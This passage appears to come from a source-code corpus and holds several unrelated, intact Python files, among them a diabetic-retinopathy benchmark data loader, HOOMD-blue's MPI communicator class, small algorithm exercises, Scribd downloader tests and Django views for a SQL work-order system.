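  # lowest-uncertainty points (indexes 1 and 3) before applying metric_fn, while the
  # 1.0 row scores all four; plotting "mean" against "retained_data" then gives the
  # usual metric-versus-retained-data curve.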
@property
def datasets(self) -> tf.data.Dataset:
"""Pointer to the processed datasets."""
return self.__ds
@property
def info(self) -> BenchmarkInfo:
"""Text description of the benchmark."""
return BenchmarkInfo(description="", urls="", setup="", citation="")
@property
def level(self) -> Level:
"""The downstream task level."""
return self.__level
@staticmethod
def loss() -> tfk.losses.Loss:
"""Loss used for training binary classifiers."""
return tfk.losses.BinaryCrossentropy()
@staticmethod
def metrics() -> tfk.metrics.Metric:
"""Evaluation metrics used for monitoring training."""
return [tfk.metrics.BinaryAccuracy(), tfk.metrics.AUC()]
@staticmethod
def class_weight() -> Sequence[float]:
"""Class weights used for rebalancing the dataset, by skewing the `loss`
accordingly."""
return [1.0, 4.0]
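  # A hedged sketch of how these weights would typically be consumed (the fit() call
  # and the 0/1 class-index mapping are assumptions, following the standard tf.keras API):
  #
  #   model.fit(x, y, class_weight={0: 1.0, 1: 4.0}, ...)
  #
  # i.e. errors on the positive class are weighted four times as heavily as the negative class.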
@classmethod
def load(
cls,
level: Union[Text, Level] = "realworld",
batch_size: int = 64,
data_dir: Optional[Text] = None,
as_numpy: bool = False,
) -> DataSplits:
"""Loads the datasets for the benchmark.
Args:
      level: `Level` or `str`, downstream task level.
batch_size: (optional) `int`, number of datapoints
per mini-batch.
data_dir: (optional) `str`, path to parent data directory.
as_numpy: (optional) `bool`, if True returns python generators
with `numpy.ndarray` outputs.
Returns:
A namedtuple with properties:
* train: `tf.data.Dataset`, train dataset.
* validation: `tf.data.Dataset`, validation dataset.
* test: `tf.data.Dataset`, test dataset.
"""
import tensorflow_datasets as tfds
from .tfds_adapter import DiabeticRetinopathyDiagnosis
# Fetch datasets
try:
ds_train, ds_validation, ds_test = DiabeticRetinopathyDiagnosis(
data_dir=data_dir or DATA_DIR,
config=level).as_dataset(split=["train", "validation", "test"],
shuffle_files=True,
batch_size=batch_size)
except AssertionError as ae:
raise AssertionError(
str(ae) +
" Run DiabeticRetinopathyDiagnosisBecnhmark.download_and_prepare()"
" first and then retry.")
# Parse task level
level = level if isinstance(level, Level) else Level.from_str(level)
# Dataset tranformations
transforms_train, transforms_eval = cls._preprocessors()
# Apply transformations
ds_train = ds_train.map(transforms_train,
num_parallel_calls=tf.data.experimental.AUTOTUNE)
ds_validation = ds_validation.map(
transforms_eval, num_parallel_calls=tf.data.experimental.AUTOTUNE)
ds_test = ds_test.map(transforms_eval,
num_parallel_calls=tf.data.experimental.AUTOTUNE)
# Prefetches datasets to memory
ds_train = ds_train.prefetch(tf.data.experimental.AUTOTUNE)
ds_validation = ds_validation.prefetch(tf.data.experimental.AUTOTUNE)
ds_test = ds_test.prefetch(tf.data.experimental.AUTOTUNE)
if as_numpy:
# Convert to NumPy iterators
ds_train = tfds.as_numpy(ds_train)
ds_validation = tfds.as_numpy(ds_validation)
ds_test = tfds.as_numpy(ds_test)
return DataSplits(ds_train, ds_validation, ds_test)
@classmethod
def download_and_prepare(cls, levels=None) -> None:
"""Downloads dataset from Kaggle, extracts zip files and processes it using
`tensorflow_datasets`.
Args:
levels: (optional) `iterable` of `str`, specifies which
levels from {'medium', 'realworld'} to prepare,
if None it prepares all the levels.
Raises:
OSError: if `~/.kaggle/kaggle.json` is not set up.
"""
# Disable GPU for data download, extraction and preparation
import os
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
cls._download()
# cls._extract()
    # cls._prepare(levels)
@staticmethod
def _download() -> None:
"""Downloads data from Kaggle using `tensorflow_datasets`.
Raises:
OSError: if `~/.kaggle/kaggle.json` is not set up.
"""
import subprocess as sp
import tensorflow_datasets as tfds
# Append `/home/$USER/.local/bin` to path
os.environ["PATH"] += ":/home/{}/.local/bin/".format(os.environ["USER"])
# Download all files from Kaggle
drd = tfds.download.kaggle.KaggleCompetitionDownloader(
"diabetic-retinopathy-detection")
try:
for dfile in drd.competition_files:
drd.download_file(dfile,
output_dir=_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR)
except sp.CalledProcessError as cpe:
raise OSError(
str(cpe) + "." +
" Make sure you have ~/.kaggle/kaggle.json setup, fetched from the Kaggle website"
" https://www.kaggle.com/<username>/account -> 'Create New API Key'."
" Also accept the dataset license by going to"
" https://www.kaggle.com/c/diabetic-retinopathy-detection/rules"
" and look for the button 'I Understand and Accept' (make sure when reloading the"
" page that the button does not pop up again).")
@staticmethod
def _extract() -> None:
"""Extracts zip files downloaded from Kaggle."""
import glob
import tqdm
import zipfile
import tempfile
# Extract train and test original images
for split in ["train", "test"]:
# Extract "<split>.zip.00*"" files to "<split>"
with tempfile.NamedTemporaryFile() as tmp:
# Concatenate "<split>.zip.00*" to "<split>.zip"
for fname in tqdm.tqdm(
sorted(
glob.glob(
os.path.join(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR,
"{split}.zip.00*".format(split=split))))):
# Unzip "<split>.zip" to "<split>"
with open(fname, "rb") as ztmp:
tmp.write(ztmp.read())
with zipfile.ZipFile(tmp) as zfile:
for image in tqdm.tqdm(iterable=zfile.namelist(),
total=len(zfile.namelist())):
zfile.extract(member=image,
path=_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR)
# Delete "<split>.zip.00*" files
for splitzip in os.listdir(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR):
if "{split}.zip.00".format(split=split) in splitzip:
os.remove(
os.path.join(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR, splitzip))
# Extract "sample.zip", "trainLabels.csv.zip"
for fname in ["sample", "trainLabels.csv"]:
zfname = os.path.join(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR,
"{fname}.zip".format(fname=fname))
with zipfile.ZipFile(zfname) as zfile:
zfile.extractall(_DIABETIC_RETINOPATHY_DIAGNOSIS_DATA_DIR)
os.remove(zfname)
@staticmethod
def _prepare(levels=None) -> None:
"""Generates the TFRecord objects for medium and realworld experiments."""
import multiprocessing
from absl import logging
from .tfds_adapter import DiabeticRetinopathyDiagnosis
    # Handle each level individually
for level in levels or ["medium", "realworld"]:
dtask = DiabeticRetinopathyDiagnosis(data_dir=DATA_DIR, config=level)
logging.debug("=== Preparing TFRecords for {} ===".format(level))
dtask.download_and_prepare()
@classmethod
def _preprocessors(cls) -> Tuple[transforms.Transform, transforms.Transform]:
"""Applies transformations to the raw data."""
import tensorflow_datasets as tfds
# Transformation hyperparameters
mean = np.asarray([0.42606387, 0.29752496, 0.21309826])
stddev = np.asarray([0.27662534, 0.20280295, 0.1687619])
class Parse(transforms.Transform):
"""Parses datapoints from raw `tf.data.Dataset`."""
def __call__(self, x, y=None):
"""Returns `as_supervised` tuple."""
return x["image"], x["label"]
class CastX(transforms.Transform):
"""Casts image to `dtype`."""
def __init__(self, dtype):
"""Constructs a type caster."""
self.dtype = dtype
def __call__(self, x, y):
"""Returns casted image (to `dtype`) and its (unchanged) label as
tuple."""
return tf.cast(x, self.dtype), y
class To01X(transforms.Transform):
"""Rescales image to [min, max]=[0, 1]."""
def __call__(self, x, y):
"""Returns rescaled image and its (unchanged) label as tuple."""
return x / 255.0, y
# Get augmentation schemes
[augmentation_config,
no_augmentation_config] = cls._ImageDataGenerator_config()
# Transformations for train dataset
transforms_train = transforms.Compose([
Parse(),
CastX(tf.float32),
To01X(),
transforms.Normalize(mean, stddev),
        # TODO(filangel): handle batch with ImageDataGenerator
# transforms.RandomAugment(**augmentation_config),
])
# Transformations for validation/test dataset
transforms_eval = transforms.Compose([
Parse(),
CastX(tf.float32),
To01X(),
transforms.Normalize(mean, stddev),
        # TODO(filangel): handle batch with ImageDataGenerator
# transforms.RandomAugment(**no_augmentation_config),
])
return transforms_train, transforms_eval
@staticmethod
def _ImageDataGenerator_config():
"""Returns the configs for the
`tensorflow.keras.preprocessing.image.ImageDataGenerator`, used for the
random augmentation of the dataset, following the implementation of
https://github.com/chleibig/disease-detection/blob/f3401b26aa9b832ff77afe93
e3faa342f7d088e5/scripts/inspect_data_augmentation.py."""
augmentation_config = dict(
featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
zca_whitening=False,
rotation_range=180.0,
width_shift_range=0.05,
height_shift_range=0.05,
shear_range=0.,
zoom_range=0.10,
channel_shift_range=0.,
fill_mode="constant",
cval=0.,
horizontal_flip=True,
vertical_flip=True,
data_format="channels_last",
)
no_augmentation_config = dict(
featurewise_center=False,
samplewise_center=False,
featurewise_std_normalization=False,
samplewise_std_normalization=False,
zca_whitening=False,
rotation_range=0.0,
width_shift_range=0.0,
height_shift_range=0.0,
shear_range=0.,
zoom_range=0.0,
channel_shift_range=0.,
fill_mode="nearest",
cval=0.,
horizontal_flip=False,
vertical_flip=False,
data_format="channels_last",
)
return augmentation_config, no_augmentation_config
|
setup.py | stjordanis/MONeT-1 | 161 | 8376 | <filename>setup.py
import setuptools
setuptools.setup(
name="monet_memory_optimized_training",
version="0.0.1",
description="Memory Optimized Network Training Framework",
url="https://github.com/philkr/lowrank_conv",
packages=setuptools.find_packages(include = ['monet', 'monet.*', 'models', 'checkmate', 'gist']),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires='>=3.6',
)
|
hoomd/communicator.py | EdwardZX/hoomd-blue | 204 | 8400 | # Copyright (c) 2009-2021 The Regents of the University of Michigan
# This file is part of the HOOMD-blue project, released under the BSD 3-Clause
# License.
"""MPI communicator."""
from hoomd import _hoomd
import hoomd
import contextlib
class Communicator(object):
"""MPI communicator.
Args:
mpi_comm: Accepts an mpi4py communicator. Use this argument to perform
many independent hoomd simulations where you communicate between those
simulations using mpi4py.
ranks_per_partition (int): (MPI) Number of ranks to include in a
partition.
`Communicator` initialize MPI communications for a `hoomd.Simulation`. To
use MPI, launch your Python script with an MPI launcher (e.g. ``mpirun`` or
``mpiexec``). By default, `Communicator` uses all ranks provided by the
launcher ``num_launch_ranks`` for a single `hoomd.Simulation` object which
decomposes the state onto that many domains.
Set ``ranks_per_partition`` to an integer to partition launched ranks into
``num_launch_ranks / ranks_per_partition`` communicators, each with their
own `partition` index. Use this to perform many simulations in parallel, for
example by using `partition` as an index into an array of state points to
execute.
"""
def __init__(self, mpi_comm=None, ranks_per_partition=None):
# check ranks_per_partition
if ranks_per_partition is not None:
if not hoomd.version.mpi_enabled:
raise RuntimeError(
"The ranks_per_partition option is only available in MPI.\n"
)
mpi_available = hoomd.version.mpi_enabled
self.cpp_mpi_conf = None
# create the specified configuration
if mpi_comm is None:
self.cpp_mpi_conf = _hoomd.MPIConfiguration()
else:
if not mpi_available:
raise RuntimeError("mpi_comm is not supported in serial builds")
handled = False
# pass in pointer to MPI_Comm object provided by mpi4py
try:
import mpi4py
if isinstance(mpi_comm, mpi4py.MPI.Comm):
addr = mpi4py.MPI._addressof(mpi_comm)
self.cpp_mpi_conf = \
_hoomd.MPIConfiguration._make_mpi_conf_mpi_comm(addr)
handled = True
except ImportError:
# silently ignore when mpi4py is missing
pass
# undocumented case: handle plain integers as pointers to MPI_Comm
# objects
if not handled and isinstance(mpi_comm, int):
self.cpp_mpi_conf = \
_hoomd.MPIConfiguration._make_mpi_conf_mpi_comm(mpi_comm)
handled = True
if not handled:
raise RuntimeError(
"Invalid mpi_comm object: {}".format(mpi_comm))
if ranks_per_partition is not None:
# check validity
if (self.cpp_mpi_conf.getNRanksGlobal() % ranks_per_partition):
raise RuntimeError('Total number of ranks is not a multiple of '
'ranks_per_partition.')
# split the communicator into partitions
self.cpp_mpi_conf.splitPartitions(ranks_per_partition)
@property
def num_ranks(self):
"""int: The number of ranks in this partition.
When initialized with ``ranks_per_partition=None``, `num_ranks` is equal
to the ``num_launch_ranks`` set by the MPI launcher. When using
partitions, `num_ranks` is equal to ``ranks_per_partition``.
Note:
Returns 1 in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
return self.cpp_mpi_conf.getNRanks()
else:
return 1
@property
def rank(self):
"""int: The current rank within the partition.
Note:
Returns 0 in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
return self.cpp_mpi_conf.getRank()
else:
return 0
@property
def num_partitions(self):
"""int: The number of partitions in this execution.
Create partitions with the ``ranks_per_partition`` argument on
initialization. Then, the number of partitions is
``num_launch_ranks / ranks_per_partition``.
Note:
Returns 1 in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
return self.cpp_mpi_conf.getNPartitions()
else:
return 1
@property
def partition(self):
"""int: The current partition.
Note:
Returns 0 in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
return self.cpp_mpi_conf.getPartition()
else:
return 0
def barrier_all(self):
"""Perform a MPI barrier synchronization across all ranks.
Note:
Does nothing in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
_hoomd.mpi_barrier_world()
def barrier(self):
"""Perform a barrier synchronization across all ranks in the partition.
Note:
Does nothing in builds with ENABLE_MPI=off.
"""
if hoomd.version.mpi_enabled:
self.cpp_mpi_conf.barrier()
@contextlib.contextmanager
def localize_abort(self):
"""Localize MPI_Abort to this partition.
HOOMD calls ``MPI_Abort`` to tear down all running MPI processes
whenever there is an uncaught exception. By default, this will abort the
entire MPI execution. When using partitions, an uncaught exception on
one partition will therefore abort all of them.
Use the return value of :py:meth:`localize_abort()` as a context manager
to tell HOOMD that all operations within the context will use only
that MPI communicator so that an uncaught exception in one partition
will only abort that partition and leave the others running.
"""
global _current_communicator
prev = _current_communicator
_current_communicator = self
yield None
_current_communicator = prev
# store the "current" communicator to be used for MPI_Abort calls. This defaults
# to the world communicator, but users can opt in to a more specific
# communicator using the Device.localize_abort context manager
_current_communicator = Communicator()
|
pymclevel/test/__init__.py | bennettdc/MCEdit-Unified | 673 | 8412 | __author__ = 'Rio'
|
Python/other/merge_interval.py | TechSpiritSS/NeoAlgo | 897 | 8424 | '''
Given an array of intervals, merge all overlapping intervals,
and return an array of the non-overlapping intervals that cover all the intervals in the input.
Input: intervals = [[1,3],[2,6],[8,10],[15,18]]
Output: [[1,6],[8,10],[15,18]]
Explanation: Since intervals [1,3] and [2,6] overlaps, merge them into [1,6].
'''
def merge(intervals):
    # sort the intervals by their start value
    intervals.sort()
    # stack of merged, non-overlapping intervals
    intervals_stack = []
    for pair in intervals:
        if len(intervals_stack) == 0:
            # the first interval goes straight onto the stack
            intervals_stack.append(pair)
        else:
            # compare the current interval with the top of the stack
            current_pair = intervals_stack[-1]
            if current_pair[1] >= pair[0]:
                # overlap: replace the top with the merged interval
                intervals_stack.pop()
                if current_pair[1] < pair[1]:
                    new_pair = [current_pair[0], pair[1]]
                    intervals_stack.append(new_pair)
                else:
                    new_pair = [current_pair[0], current_pair[1]]
                    intervals_stack.append(new_pair)
            else:
                # no overlap: keep the current interval as-is
                intervals_stack.append(pair)
    # result: the merged, non-overlapping intervals
return intervals_stack
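# Trace on the sample input from the docstring: after sorting, [1,3] is pushed first;
# [2,6] overlaps (3 >= 2), so the top is replaced by the merged [1,6]; [8,10] and
# [15,18] do not overlap the top, so they are pushed unchanged, giving
# [[1,6],[8,10],[15,18]].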
if __name__ == '__main__':
R = int(input("Enter the number of rows:"))
C = int(input("Enter the number of columns:"))
interval = [[int(input("Enter the elements: ")) for x in range (C)] for y in range(R)]
print("Overlapping interval: ",interval)
print("Non-overlapping intervals: ",merge(interval))
"""
Time complexity : O(n log n) (dominated by the sort; the merge pass itself is O(n))
Space complexity : O(n) (for the stack of merged intervals)
INPUT:-
Enter the number of rows:4
Enter the number of columns:2
Enter the elements: 1
Enter the elements: 3
Enter the elements: 2
Enter the elements: 6
Enter the elements: 8
Enter the elements: 10
Enter the elements: 15
Enter the elements: 18
OUTPUT:-
Overlapping interval: [[1, 3], [2, 6], [8, 10], [15, 18]]
Non-overlapping intervals: [[1, 6], [8, 10], [15, 18]]
"""
|
test/regression/features/arithmetic/mult.py | ppelleti/berp | 137 | 8438 | print(18 * 1234)
print(18 * 1234 * 2)
print(0 * 1)
print(1 * 0)
print(0.0 * 1.0)
print(1.0 * 0.0)
|
src/nile/core/run.py | kootsZhin/nile | 121 | 8469 | """Command to run Nile scripts."""
import logging
from importlib.machinery import SourceFileLoader
from nile.nre import NileRuntimeEnvironment
def run(path, network):
"""Run nile scripts passing on the NRE object."""
logger = logging.getLogger()
logger.disabled = True
script = SourceFileLoader("script", path).load_module()
nre = NileRuntimeEnvironment(network)
script.run(nre)
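# A minimal sketch of the script contract this loader expects (the file name is
# illustrative): the target module only has to expose a `run(nre)` function, which
# receives the NileRuntimeEnvironment created above.
#
#   # scripts/hello.py
#   def run(nre):
#       print("running script with NRE:", nre)
#       # use nre's helpers here; the exact API is defined by NileRuntimeEnvironment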
|
Python/Basic Data Types/Lists/Solution.py | PawarAditi/HackerRank | 219 | 8470 | <reponame>PawarAditi/HackerRank
array = []
for _ in range(int(input())):
command = input().strip().split(" ")
cmd_type = command[0]
if (cmd_type == "print"):
print(array)
elif (cmd_type == "sort"):
array.sort()
elif (cmd_type == "reverse"):
array.reverse()
elif (cmd_type == "pop"):
array.pop()
elif (cmd_type == "remove"):
array.remove(int(command[1]))
elif (cmd_type == "append"):
array.append(int(command[1]))
elif (cmd_type == "insert"):
array.insert(int(command[1]), int(command[2])) |
scribdl/test/test_download.py | fatshotty/scribd-downloader | 182 | 8482 | <filename>scribdl/test/test_download.py
from ..downloader import Downloader
import os
import pytest
@pytest.fixture
def cwd_to_tmpdir(tmpdir):
os.chdir(str(tmpdir))
def test_audiobook_download(cwd_to_tmpdir, monkeypatch):
audiobook_url = "https://www.scribd.com/audiobook/237606860/100-Ways-to-Motivate-Yourself-Change-Your-Life-Forever"
audiobook_downloader = Downloader(audiobook_url)
audio = audiobook_downloader.download()
assert audio[0] == "100_Ways_to_Motivate_Yourself__Change_Your_Life_Forever_preview.mp3"
assert os.path.getsize(audio[0]) == 2127830
def test_text_document_download(cwd_to_tmpdir):
text_doc_url = "https://www.scribd.com/document/96882378/Trademark-License-Agreement"
text_downloader = Downloader(text_doc_url)
md_doc = text_downloader.download(is_image_document=False)
assert os.path.getsize(md_doc.input_content) in range(1000, 2000)
md_doc.to_pdf()
assert os.path.getsize(md_doc.pdf_path) in range(20000, 31000)
def test_img_document_download(cwd_to_tmpdir):
img_doc_url = "https://www.scribd.com/doc/136711944/Signature-Scanning-and-Verification-in-Finacle"
img_downloader = Downloader(img_doc_url)
imgs = img_downloader.download(is_image_document=True)
assert len(imgs.input_content) == 2
imgs.to_pdf()
assert os.path.getsize(imgs.pdf_path) in range(140000, 150000)
def test_book_download(cwd_to_tmpdir, monkeypatch):
book_url = "https://www.scribd.com/read/262694921/Acting-The-First-Six-Lessons"
book_downloader = Downloader(book_url)
# We don't want to clutter stdout with book contents if this test fails
monkeypatch.setattr("builtins.print", lambda x: None)
md_book = book_downloader.download()
assert os.path.getsize(md_book.input_content) in range(10000, 20000)
md_book.to_pdf()
assert os.path.getsize(md_book.pdf_path) in range(200000, 2500000)
|
yasql/apps/sqlorders/views.py | Fanduzi/YaSQL | 443 | 8485 | # -*- coding:utf-8 -*-
# edit by fuzongfei
import base64
import datetime
# Create your views here.
import json
from django.http import Http404, HttpResponse
from django.utils import timezone
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework import filters
from rest_framework.exceptions import PermissionDenied
from rest_framework.generics import ListAPIView, GenericAPIView, CreateAPIView, UpdateAPIView, DestroyAPIView
from rest_framework.views import APIView
from rest_framework.viewsets import ViewSet
from libs import permissions
from libs.Pagination import Pagination
from libs.RenderColumns import render_dynamic_columns
from libs.response import JsonResponseV1
from sqlorders import models, serializers
from sqlorders.filters import SqlOrderListFilter, GetTasksListFilter
class GetDBEnvironment(ListAPIView):
queryset = models.DbEnvironment.objects.all()
serializer_class = serializers.DbEnvironmentSerializer
    # Get the order environments
def get(self, request, *args, **kwargs):
serializer = self.get_serializer(self.get_queryset(), many=True)
return JsonResponseV1(data=serializer.data)
class GetDbSchemas(APIView):
    # Get the list of schemas for the specified environment and purpose
def get(self, request):
serializer = serializers.DbSchemasSerializer(data=request.query_params)
if serializer.is_valid():
return JsonResponseV1(data=serializer.query)
return JsonResponseV1(message=serializer.errors, code='0001')
class IncepSyntaxCheckView(APIView):
def post(self, request, *args, **kwargs):
serializer = serializers.IncepSyntaxCheckSerializer(data=request.data)
if serializer.is_valid():
s, data = serializer.check()
render_columns = [
{'key': 'order_id', 'value': '序号'},
{'key': 'stage', 'value': '阶段'},
{'key': 'stage_status', 'value': '阶段状态'},
{'key': 'error_level', 'value': '错误级别'},
{'key': 'error_message', 'value': '错误信息', 'width': '35%'},
{'key': 'sql', 'value': 'SQL内容', 'width': '25%', 'ellipsis': True},
{'key': 'affected_rows', 'value': '影响/扫描行数'}
]
columns = render_dynamic_columns(render_columns)
message = '语法检查未发现异常,可以提交'
if not s:
message = '语法检查发现异常,详情请查看输出,更正后在提交'
d = {
'status': 0 if s else 1,
'data': data
}
data = {'columns': columns, 'data': d}
return JsonResponseV1(data=data, message=message)
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class SqlOrdersCommit(GenericAPIView):
permission_classes = (permissions.CanCommitOrdersPermission,)
serializer_class = serializers.SqlOrdersCommitSerializer
def post(self, request, *args, **kwargs):
serializer = self.get_serializer(data=request.data)
if serializer.is_valid():
serializer.save()
return JsonResponseV1(message="提交成功")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class SqlOrdersList(ListAPIView):
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrders.objects.all()
serializer_class = serializers.SqlOrdersListSerializer
pagination_class = Pagination
filter_backends = [DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter]
filter_class = SqlOrderListFilter
ordering = ['-created_at']
search_fields = ['title', 'database', 'remark', 'applicant', 'progress', 'contents']
def get(self, request, *args, **kwargs):
queryset = self.filter_queryset(self.get_queryset())
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, many=True)
render_columns = [
{'key': 'progress', 'value': '进度', 'width': '8%'},
{'key': 'applicant', 'value': '申请人'},
{'key': 'department', 'value': '部门'},
{'key': 'env_name', 'value': '环境'},
{'key': 'escape_title', 'value': '标题', 'width': '18%', 'ellipsis': True},
{'key': 'sql_type', 'value': '类型'},
{'key': 'remark', 'value': '备注'},
{'key': 'version', 'value': '版本'},
{'key': 'host', 'value': '实例/库'},
{'key': 'auditor', 'value': '审核人'},
{'key': 'reviewer', 'value': '复核人'},
]
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': serializer.data}
return self.get_paginated_response(data)
class SqlOrdersDetail(ListAPIView):
"""SQL工单详情"""
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrders.objects.all()
serializer_class = serializers.SqlOrderDetailSerializer
lookup_field = 'order_id'
def get(self, request, *args, **kwargs):
queryset = self.get_object()
serializer = self.get_serializer(queryset, context={"request": request})
return JsonResponseV1(data=serializer.data)
class OpSqlOrderView(ViewSet):
"""更新SQL工单状态,如:审核,关闭等"""
permission_classes = (permissions.CanViewOrdersPermission,)
def get_obj(self, pk):
try:
obj = models.DbOrders.objects.get(pk=pk)
return obj
except models.DbOrders.DoesNotExist:
raise Http404
def approve(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_approve"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
def feedback(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_feedback"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
def close(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_close"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
def review(self, request, pk):
serializer = serializers.OpSqlOrderSerializer(instance=self.get_obj(pk),
data=request.data,
context={"request": request, "handler": "_review"})
if serializer.is_valid():
serializer.save()
return JsonResponseV1(data=serializer.data, message="操作成功")
return JsonResponseV1(message=serializer.errors, code='0001')
class GenerateTasksView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.GenerateSqlOrdersTasksSerializer(data=request.data)
if serializer.is_valid():
data = serializer.save(request)
return JsonResponseV1(data=data)
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class GetTaskIdView(APIView):
def get(self, request, *args, **kwargs):
"""根据order id返回taskid"""
order_id = kwargs.get('order_id')
task_id = models.DbOrdersExecuteTasks.objects.filter(order_id=order_id).first().task_id
return JsonResponseV1(data=task_id)
class GetTasksPreviewView(ListAPIView):
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrdersExecuteTasks.objects.all()
serializer_class = serializers.SqlOrdersTasksListSerializer
pagination_class = Pagination
filter_backends = [DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter]
filter_class = GetTasksListFilter
search_fields = ['sql']
ordering = ['created_time']
def get(self, request, *args, **kwargs):
task_id = kwargs.get('task_id')
queryset = self.filter_queryset(self.get_queryset().filter(task_id=task_id))
        # The data-hiding switch is turned on:
        # only the applicant, auditors, reviewers and superusers may view the data
obj = models.DbOrders.objects.get(
pk=models.DbOrdersExecuteTasks.objects.filter(task_id=task_id).first().order_id
)
if obj.is_hide == 'ON' and not request.user.is_superuser:
allowed_view_users = [obj.applicant]
allowed_view_users.extend([x['user'] for x in json.loads(obj.auditor)])
allowed_view_users.extend([x['user'] for x in json.loads(obj.reviewer)])
if request.user.username not in allowed_view_users:
raise PermissionDenied(detail='您没有权限查看该工单的数据,5s后,自动跳转到工单列表页面')
origin_queryset = self.queryset.filter(task_id=task_id)
total = origin_queryset.count()
progress_0 = origin_queryset.filter(progress=0).count()
progress_1 = origin_queryset.filter(progress=1).count()
progress_3 = origin_queryset.filter(progress=3).count()
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, context={'request': request}, many=True)
render_columns = [
            {'key': 'num', 'value': '序号'},  # custom 'num' field, used by the frontend to show row numbers
{'key': 'applicant', 'value': '申请人'},
{'key': 'sql', 'value': 'SQL', 'ellipsis': True, 'width': '50%'},
{'key': 'progress', 'value': '进度'},
            {'key': 'result', 'value': '查看结果'},  # custom 'result' field (view result link)
]
columns = render_dynamic_columns(render_columns)
data = {'columns': columns,
'data': {'data': serializer.data,
'total': total,
'progress_0': progress_0,
'progress_1': progress_1,
'progress_3': progress_3}}
return self.get_paginated_response(data)
class GetTasksListView(ListAPIView):
permission_classes = (permissions.CanViewOrdersPermission,)
queryset = models.DbOrdersExecuteTasks.objects.all()
serializer_class = serializers.SqlOrdersTasksListSerializer
pagination_class = Pagination
filter_backends = [DjangoFilterBackend, filters.SearchFilter, filters.OrderingFilter]
filter_class = GetTasksListFilter
search_fields = ['sql']
ordering = ['created_time']
def get(self, request, *args, **kwargs):
task_id = kwargs.get('task_id')
queryset = self.filter_queryset(self.get_queryset().filter(task_id=task_id))
        # The data-hiding switch is turned on:
        # only the applicant, auditors, reviewers and superusers may view the data
obj = models.DbOrders.objects.get(
pk=models.DbOrdersExecuteTasks.objects.filter(task_id=task_id).first().order_id
)
if obj.is_hide == 'ON' and not request.user.is_superuser:
allowed_view_users = [obj.applicant]
allowed_view_users.extend([x['user'] for x in json.loads(obj.auditor)])
allowed_view_users.extend([x['user'] for x in json.loads(obj.reviewer)])
if request.user.username not in allowed_view_users:
raise PermissionDenied(detail='您没有权限查看该工单的数据,5s后,自动跳转到工单列表页面')
page = self.paginate_queryset(queryset)
serializer = self.get_serializer(page, context={'request': request}, many=True)
render_columns = [
            {'key': 'num', 'value': '序号'},  # custom 'num' field, used by the frontend to show row numbers
{'key': 'applicant', 'value': '申请人'},
{'key': 'sql', 'value': 'SQL', 'ellipsis': True, 'width': '50%'},
{'key': 'progress', 'value': '进度'},
            {'key': 'execute', 'value': '执行'},  # custom 'execute' field (execute button)
            {'key': 'result', 'value': '查看结果'},  # custom 'result' field (view result link)
]
if queryset.exists():
if queryset.first().sql_type == 'DDL':
render_columns.insert(-1, {'key': 'ghost_pause', 'value': '暂停(gh-ost)'})
render_columns.insert(-1, {'key': 'ghost_recovery', 'value': '恢复(gh-ost)'})
columns = render_dynamic_columns(render_columns)
data = {'columns': columns, 'data': serializer.data}
return self.get_paginated_response(data)
class ExecuteSingleTaskView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.ExecuteSingleTaskSerializer(data=request.data)
if serializer.is_valid():
serializer.execute(request)
return JsonResponseV1(message="任务提交成功,请查看输出")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class ExecuteMultiTasksView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.ExecuteMultiTasksSerializer(data=request.data)
if serializer.is_valid():
serializer.execute(request)
return JsonResponseV1(message="任务提交成功,请查看输出")
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class ThrottleTaskView(APIView):
permission_classes = (permissions.CanExecuteOrdersPermission,)
def post(self, request, *args, **kwargs):
serializer = serializers.ThrottleTaskSerializer(data=request.data)
if serializer.is_valid():
message = serializer.execute(request)
return JsonResponseV1(message=message)
return JsonResponseV1(message=serializer.errors, code='0001', flat=True)
class GetTasksResultView(ListAPIView):
"""SQL工单详情"""
